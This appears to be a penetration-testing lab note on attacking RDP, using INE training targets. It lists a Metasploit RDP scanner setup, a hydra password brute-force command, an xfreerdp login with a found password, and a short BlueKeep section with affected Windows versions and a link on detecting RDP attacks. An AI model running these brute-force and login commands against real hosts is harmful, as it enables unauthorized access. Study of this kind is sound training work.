# Port 3389 - RDP

### Identifying non deafult port as RDP with aux scanner

```
msfconsole
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS demo.ine.local
set RPORT 3333
exploit
```

We can Identify RDP endpoints using an auxiliary module on port 3333 if it’s running RDP.

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2F1dzi3Yrdrh8cKoa9GWdu%2FScreenshot_2.png?alt=media&#x26;token=7d6bdb5c-e933-4b24-809a-86d0b404be62" alt=""><figcaption></figcaption></figure>

### Bruteforcing RDP (hydra)

```
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://demo.ine.local -s 3333
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2F3srXGm71IlWPHvZLp8MS%2FScreenshot_3.png?alt=media&#x26;token=5268d0aa-6e4c-4e37-89fc-a3a728963057" alt=""><figcaption></figcaption></figure>

### XFREERDP

```
xfreerdp /u:administrator /p:qwertyuiop /v:demo.ine.local:3333
```

### Detecting RDP Attacks

{% embed url="<https://www.thedfirspot.com/post/lateral-movement-remote-desktop-protocol-rdp-event-logs>" %}

### CVE-2019-0708 Bluekeep

Fails if NW authentication is enabled

The BlueKeep vulnerability affects multiple versions of Windows:

* XP
* Vista
* Windows 7
* Windows Server 2008 & R2

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FmbtI1s5nse18oPng9wyS%2Fimage.png?alt=media&#x26;token=3943c30d-cfd5-4da7-96fe-304aaa9c6550" alt=""><figcaption></figcaption></figure>

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FENGVvJUWOT5DzQs26O8q%2Fimage.png?alt=media&#x26;token=ddbab3db-fef0-48ba-aa03-ace55cc3b9c1" alt=""><figcaption></figcaption></figure>